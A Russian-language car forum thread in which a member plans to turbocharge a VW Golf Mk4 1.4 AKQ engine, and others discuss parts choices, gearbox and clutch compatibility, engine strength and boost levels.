+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Турбо на 1.4

GTI-Racing Student112 is on a distinguished road Аватар для Student112
    Машина
    Bolf Mk4 1.4Turbo

Турбо на 1.4

Всем привет))Я собрался надуть двиг 1.4 AKQ,почти со всеми запчастями определился но вот незнаю от чего сцепление поставить,подойдет ли от 1.8Т,коробку тож наверно с 1.8Т если подойдет или может кто знает где пару купить по длинее на мою коробку,с двига хочу снять 200-220 сил.
    VW Bolf 4 /1.4AKQ Turbo(0.8 bar) 197.6 Hp-Январь 5.1 -ПРОДАН/1.8BigTurbo+4motoin-в процессе/ Red / Coil-over RACELAND/17" Volk Racing SE37/312 тормоза/ и еще много чего впереди)) Кострома-М.О. Дубна

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Отличное начало и я даже не вижу причин не делать этого.
    И хорошо бы расширить инфу про то с чем ты уже определился. Какие спеки будут, какие работы планируешь, решен ли вопрос с прошивкой ?

Хорошо бы посмотреть тебе какой код коробки стоит 02J ...если 5-ст, скорей всего она и стоит, и это такая же КПП как и у 1.8Т разница лишь только уже в коде самой коробки..... там более десятка разных вариантов передаточных чисел.
    Заменив и подобрав Маховичог и подобрав к нему сцепление, я думаю и твоя КПП состыкуется с этим делом.

Длиннее пару я бы не ставил.
    песок сыпется....не останавливайтесь на достигнутом !

Машина
    Bolf Mk4 1.4Turbo
    Турба TD04
    Поршни ковка(т.к. литые немогу найти нигде под мой двиг) с выемкой для уменьшения степени сжатия до 8
    Прокладка стандартная т.к. металическая
    Насос от 1.8Т по идее должен прокачать столько без проблем. На сколько я помню точно такой же ставился вплоть до моторов 4.2л на ауди.
    Форсы 440
    Кулер сааб
    Мозги можно стандартные + топливный контроллер + буст-контроллер и заменить датчик абсолютного давления на что-нибудь, что видит избыток.
    Но скорее всего поставлю Январь или Микас
    Январь говорят по лучше буит
    Впуск,Шатуны,валы, охлаждение сток так как машинка для города и трассы на дальняк.
    Выпуск на 63 трубе
    ДАД,ДТВ
    ну
    По поводу коробки,на моем двиге коробка самая короткая стоитя думаю нужна подлиннее ну впринципе эт после сборки буит видно,насчет сцепы и маховика так и непонял подойдет или нет от 1.8Т,
    С прошивкой, хороший знакомый собравший пару турбомоторов настривался в Москве у своего знакомого,говорит что и мне настроит.
    В марте планирую разобрать мотор,заказать ковку,собрать, начать обкатку и закупть все ништячки и в мае после обкатки все это дело установить.
    Единственное тока за что я боюсь дак это точ то на моем движке колено считается несьемным - не дриснуло бы.
    коробку седня гляну
    VW Bolf 4 /1.4AKQ Turbo(0.8 bar) 197.6 Hp-Январь 5.1 -ПРОДАН/1.8BigTurbo+4motoin-в процессе/ Red / Coil-over RACELAND/17" Volk Racing SE37/312 тормоза/ и еще много чего впереди)) Кострома-М.О. Дубна

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Отлично, я бы предпочел тоже январь.... 4-ре горшка и турбо уже много-много есть рукастых людей пишуших.

Интересная задумка, я вот только что-то как то не уверен про крепость блока и возможности его форсировки, но попробывать интересно.
    Если грамотно подготовить низ должно все получится. Да и мощность у тебя планируемая не такая большая............. насос я бы заменил, на фоне доработок и желаний стоковый нет смысла оставлять, лучше добавить и за 150 уй взять проверенный универсальный Валбро.

Машина
    Bolf Mk4 1.4Turbo
    Цитата Сообщение от BON Посмотреть сообщение
    Интересная задумка, я вот только что-то как то не уверен про крепость блока и возможности его форсировки, но попробывать интересно.
    Ну впринципе ВАЗовские блоки и 400 сил держат.
    Цитата Сообщение от BON Посмотреть сообщение
    Если грамотно подготовить низ должно все получится.
    А вот с низом что делать ?
    я вобще тока поршня хотел заменить.

GTI-Racing total is on a distinguished road Аватар для total
    Машина
    MkV GTI
    чет я сомневаюсь что можно на таком объеме выдуть 220 сил с TD04..

Машина
    Skoda
    Цитата Сообщение от Student112 Посмотреть сообщение
    Ну впринципе ВАЗовские блоки и 400 сил держат.

А вот с низом что делать ?
    я вобще тока поршня хотел заменить.

Блоки ВАЗ это понятно, практика показала, но с твоим мотором мы не найдем уже кто это даказал или собирается. Увеличение мощности более чем в 2 раза и в частности момента может непрогнозируемо сказаться на его работе. Тут и повышенные требования к стенкам блока и крепости в целом, посадочным местам колена и его реакции на мощность в слабых местах, шатунам (которые менять в твоем случае обязательно), как поведет себя система охлаждения рассчитанная на 75 пони с запасом в 20%. Все это предстоит выяснить когда построишь. Сразу обзаводись датчиками точными которые позволят отслеживать тенденцию в работе построенного мотора.
    Оборотами я мотор такой бы не баловал, поэтому идея про валы мне не нравится, турбо мотор привлекает ездой на моменте в зоне средних оборотов......... и обороты убивают мотор гораздо быстрее.

Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Машина
    Golf 1.8t 460лс 520Нм
    Цитата Сообщение от total Посмотреть сообщение
    чет я сомневаюсь что можно на таком объеме выдуть 220 сил с TD04..
    спокойно надует... чем тебе тд04 не нравится?? у меня на 1.8т она дует 1.7бар) машинка едет очень бодро))

GTI-Racing total is on a distinguished road Аватар для total
    Машина
    MkV GTI
    Цитата Сообщение от Чуйкин Посмотреть сообщение
    спокойно надует... чем тебе тд04 не нравится?? у меня на 1.8т она дует 1.7бар) машинка едет очень бодро))
    я разьве сказал что не нравится? у себя бы с радостью поменял, былоб это просто:)

Машина
    Bolf Mk4 1.4Turbo
    Цитата Сообщение от Чуйкин Посмотреть сообщение
    у меня на 1.8т она дует 1.7бар) машинка едет очень бодро))
    Ну я стока дуть не собираюсь иначедвиг точно не выдержит,думаю 1бара для меня вполне хватит.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя